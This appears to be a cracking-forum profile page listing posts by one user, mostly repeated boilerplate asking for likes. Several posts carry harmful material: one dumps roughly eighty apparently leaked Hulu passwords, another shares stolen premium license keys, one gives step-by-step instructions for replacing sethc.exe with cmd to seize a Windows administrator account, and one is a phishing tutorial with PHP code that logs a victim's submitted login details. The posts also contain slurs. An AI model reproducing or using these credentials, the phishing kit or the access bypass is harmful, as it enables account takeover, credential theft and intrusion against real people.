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Everything posted by mesvak

  1. [hide] [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  2. [hide] [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  3. [hide] [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  4. [hide] [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  5. [hide] [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  6. [hide] :::::meSVak HULU aio2.1.01:::::::[email protected]:Spikerocks1 :::::meSVak HULU aio2.1.01:::::::[email protected]:Genesis1 :::::meSVak HULU aio2.1.01:::::::[email protected]:Marnie10 :::::meSVak HULU aio2.1.01:::::::[email protected]:Jfajfa :::::meSVak HULU aio2.1.01:::::::[email protected]:peyton3306 :::::meSVak HULU aio2.1.01:::::::[email protected]:teasha11 :::::meSVak HULU aio2.1.01:::::::[email protected]:tucker1950 :::::meSVak HULU aio2.1.01:::::::[email protected]:b09265281 :::::meSVak HULU aio2.1.01:::::::[email protected]:6252576 :::::meSVak HULU aio2.1.01:::::::[email protected]:Darklight0 :::::meSVak HULU aio2.1.01:::::::[email protected]:Brucie123 :::::meSVak HULU aio2.1.01:::::::[email protected]:madyson1 :::::meSVak HULU aio2.1.01:::::::[email protected]:jackass23 :::::meSVak HULU aio2.1.01:::::::[email protected]:Baseball1 :::::meSVak HULU aio2.1.01:::::::[email protected]:Dustin91 :::::meSVak HULU aio2.1.01:::::::[email protected]:Freedom1 :::::meSVak HULU aio2.1.01:::::::[email protected]:ASV3207168 :::::meSVak HULU aio2.1.01:::::::[email protected]:Charlie1995 :::::meSVak HULU aio2.1.01:::::::[email protected]:Uharrnx1 :::::meSVak HULU aio2.1.01:::::::[email protected]:Amjaug2008 :::::meSVak HULU aio2.1.01:::::::[email protected]:snk09112 :::::meSVak HULU aio2.1.01:::::::[email protected]:Nika1234 :::::meSVak HULU aio2.1.01:::::::[email protected]:1Tinyant :::::meSVak HULU aio2.1.01:::::::[email protected]:Scooby31 :::::meSVak HULU aio2.1.01:::::::[email protected]:electric :::::meSVak HULU aio2.1.01:::::::[email protected]:Bender12 :::::meSVak HULU aio2.1.01:::::::[email protected]:lexi1212 :::::meSVak HULU aio2.1.01:::::::[email protected]:Spikey710 :::::meSVak HULU aio2.1.01:::::::[email protected]:password890 :::::meSVak HULU aio2.1.01:::::::[email protected]:Pryde123 :::::meSVak HULU aio2.1.01:::::::[email protected]:Barcelona7 :::::meSVak HULU aio2.1.01:::::::[email protected]:1Bluedragon :::::meSVak HULU aio2.1.01:::::::[email protected]:huffman1932 :::::meSVak HULU aio2.1.01:::::::[email protected]:Ynotrld2 :::::meSVak HULU aio2.1.01:::::::[email protected]:Sharks1993 :::::meSVak HULU aio2.1.01:::::::[email protected]:Bakbbb17 :::::meSVak HULU aio2.1.01:::::::[email protected]:Olivia1987 :::::meSVak HULU aio2.1.01:::::::[email protected]:lilsquirt11 :::::meSVak HULU aio2.1.01:::::::[email protected]:darkdan74 :::::meSVak HULU aio2.1.01:::::::[email protected]:Basketball44 :::::meSVak HULU aio2.1.01:::::::[email protected]:demons26 :::::meSVak HULU aio2.1.01:::::::[email protected]:Ruffian75 :::::meSVak HULU aio2.1.01:::::::[email protected]:Tiger1998 :::::meSVak HULU aio2.1.01:::::::[email protected]:Shack222 :::::meSVak HULU aio2.1.01:::::::[email protected]:EliJames2012 :::::meSVak HULU aio2.1.01:::::::[email protected]:092407ad :::::meSVak HULU aio2.1.01:::::::[email protected]:837828kv :::::meSVak HULU aio2.1.01:::::::[email protected]:Stewie2007 :::::meSVak HULU aio2.1.01:::::::[email protected]:willnat2014 :::::meSVak HULU aio2.1.01:::::::[email protected]:candy52982 :::::meSVak HULU aio2.1.01:::::::[email protected]:Eatmenow1031 :::::meSVak HULU aio2.1.01:::::::[email protected]:Leatherbelt612 :::::meSVak HULU aio2.1.01:::::::[email protected]:tatum5507 :::::meSVak HULU aio2.1.01:::::::[email protected]:Tennessee09 :::::meSVak HULU aio2.1.01:::::::[email protected]:vanhalen57689 :::::meSVak HULU aio2.1.01:::::::[email protected]:March8th2005 :::::meSVak HULU aio2.1.01:::::::[email protected]:Drpepper12 :::::meSVak HULU aio2.1.01:::::::[email protected]:Halo3three :::::meSVak HULU aio2.1.01:::::::[email protected]:rainbow13 :::::meSVak HULU aio2.1.01:::::::[email protected]:Football1 :::::meSVak HULU aio2.1.01:::::::[email protected]:Mmilko908 :::::meSVak HULU aio2.1.01:::::::[email protected]:Tardis12 :::::meSVak HULU aio2.1.01:::::::[email protected]:Jo1993el :::::meSVak HULU aio2.1.01:::::::[email protected]:portal117 :::::meSVak HULU aio2.1.01:::::::[email protected]:gators99 :::::meSVak HULU aio2.1.01:::::::[email protected]:Leean123 :::::meSVak HULU aio2.1.01:::::::[email protected]:Musical1 :::::meSVak HULU aio2.1.01:::::::[email protected]:rickswife21498 :::::meSVak HULU aio2.1.01:::::::[email protected]:78camaro :::::meSVak HULU aio2.1.01:::::::[email protected]:Paiscool12 :::::meSVak HULU aio2.1.01:::::::[email protected]:Seth0423 :::::meSVak HULU aio2.1.01:::::::[email protected]:D0ctorwho :::::meSVak HULU aio2.1.01:::::::[email protected]:Saints14 :::::meSVak HULU aio2.1.01:::::::[email protected]:Sterling1 :::::meSVak HULU aio2.1.01:::::::[email protected]:Saragal13! :::::meSVak HULU aio2.1.01:::::::[email protected]:Dd7332347 :::::meSVak HULU aio2.1.01:::::::[email protected]:nov121995 :::::meSVak HULU aio2.1.01:::::::[email protected]:ripmonte88 :::::meSVak HULU aio2.1.01:::::::[email protected]:Shekira1 :::::meSVak HULU aio2.1.01:::::::[email protected]:Smi41793 :::::meSVak HULU aio2.1.01:::::::[email protected]:Midnight64 :::::meSVak HULU aio2.1.01:::::::[email protected]:Buffett123 :::::meSVak HULU aio2.1.01:::::::[email protected]:izzy4291 :::::meSVak HULU aio2.1.01:::::::[email protected]:Stardust77 :::::meSVak HULU aio2.1.01:::::::[email protected]:wookie89 :::::meSVak HULU aio2.1.01::::::: [/hide] respect me with u r fucking likes lils meme
  7. [hide] [/hide]
  8. [hide] [/hide]
  9. [hide] $$ gc MES/AK preMIUms CH$$Email: [email protected] Key premium: 329820-054438-761E9F-D08EBB-EDA0DC $$ gc MES/AK preMIUms CH$$Email: [email protected] Key premium: A900D3-053438-76EB1C-F921F6-B95A4B $$ gc MES/AK preMIUms CH$$Email: [email protected] Key premium: 927C36-057438-7890BE-78562E-F86723 [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils meme
  10. vouch for royals idk what he is doing but he is good i guess kappa
  11. [hide] #Turn on the UPS and the CPU, tap F8 continuously on the boot screen to get some windows start-up options. #Choose "Start windows normally" option and turn the UPS off immediately. #Then turn on the PC again, let it load. #After that you will be prompted with two options in the boot screen (again), select the first option - "Launch Start-up Repair(recommended)" #Let it load and Scan for issues. #After 5 min, It will ask you to "restore defaults", select "Cancel" option. #Let it continue... Wait for About 15-20 Minutes: #After 20 min, an error report screen will pop-up, asking to send information or not. #Ignore it, click on "View Problem Details" arrow, scroll down to the end of the report, then click a link stating X:\windows\ something...something (the link starts with an"X") #Another Window will pop-up, and will look like a notepad (it is a notepad) #Click File on the Menu-Bar, then select Open, and another window will pop-up (that's just too many windows!) #Navigate to C: drive (or whatever drive on which windows is installed), click Windows, then System32, after that click on the arrow beside the "File Type" option and select "all files" #Then search for a file named "sethc"(this is the shortcut to stickey keys), rename it to something else (Eg:abc) #Search for cmd, make its copy and rename the copy as "sethc" The End: #Close everything, restart the PC, go to the log-in screen, press shift 5 times, until a cmd (command prompt) pops-up. #Type in "net user administrator /active:yes", and this will activate the default administrator account of the PC. #Change/delete/manage/reset passwords from there. Or you can directly change passwords from cmd, type "net user (admin/any admin account's name) and then after a space put an asterix. proved by my shitty niggeriano pleb XD [/hide]
  12. [hide] 1- Open up the site that you want to make the fake page from it, after the load right click and save the page as "web page complete" 2- Now open that page with notepad, and press control+F to access search bar, and then search "login" 3- Behind the word "login" it's written .action, we don't need those so delete everything behind the login (this tutorial is for PHP, may you see login.aspx) 4- If you saw method="post" change it to method="GET" 5- Ok now save it as .html 6- Open a new notepad, and write this commands on it: <?php header (''); $handle = fopen("log.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> 7- Instead of Location:, write your login page address! 8- Now save this as Login.PHP 9- Go to website's that offer free hosts 10- Make an account, get your host and upload both of files! 11- After that you only need to give your HTML link to your victim! 12- If he opened and write his Login information you can access it! 13- If you look at PHP source, you can see log.txt that's where your victim info's saved. This Thread is just for raising your information, and I do not accept responsibility for your misuse.kappa u niggers dont use it for shitty gae af assshits thats what im saying [/hide]
  13. [hide] PUBG LOOT TRICK To GET Kar98 And ScarL skin with 500rp points. 01) Connect Any USA Vpn 02) Select Location As New York 03) Open Pubg Limited Event 04) Open Summer Event And Claim Your Kar98 And Scar-L Skin Free With 500RP Points. [/hide]
  14. [hide]MAC address spoofing 1.Open your terminal, and type ifconfig | grep HWaddr you will see your original MAC address 2. To temporary change our MAC address, we need to turn off the network interface first by running this command ifconfig eth0 down 3. After that we can configure the new MAC address ifconfig eth0 hw ether 00:00:00:00:00:02 you can change the MAC address using this hexadecimal format XX:XX:XX:XX:XX:XX 4. Now we can turn on the network interface again. ifconfig eth0 up 5. And the last we can check again our MAC whether it's change or not. if we follow until this step, MAC address will back to default after we restart our machine. Go to next page to view how to change MAC address permanently. 6. Kali Linux was built based on Debian. In all the network interface was located on /etc/network/interfaces. 7. We will configure the /etc/network/interfaces. In this tutorial I will use pico text editor, but you can choose any of your favourite text editor. pico /etc/network/interfaces 8. Now we will add one line of script to change our MAC address permanently pre-up ifconfig eth0 hw ether 00:00:00:00:00:02 9. If we want to restore the default MAC address, just add the # sign in front of script in step 8. #pre-up ifconfig eth0 hw ether 00:00:00:00:00:02 [/hide]
  15. [hide] [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  16. [hide] [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  17. [hide] [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  18. [hide] [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  19. [hide] [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  20. [hide] [/hide] nt forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  21. [hide] [/hide] nt forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  22. [hide] [/hide] nt forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  23. [hide] [/hide] nt forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  24. [hide] [/hide] nt forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils
  25. [hide] [/hide] nt forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils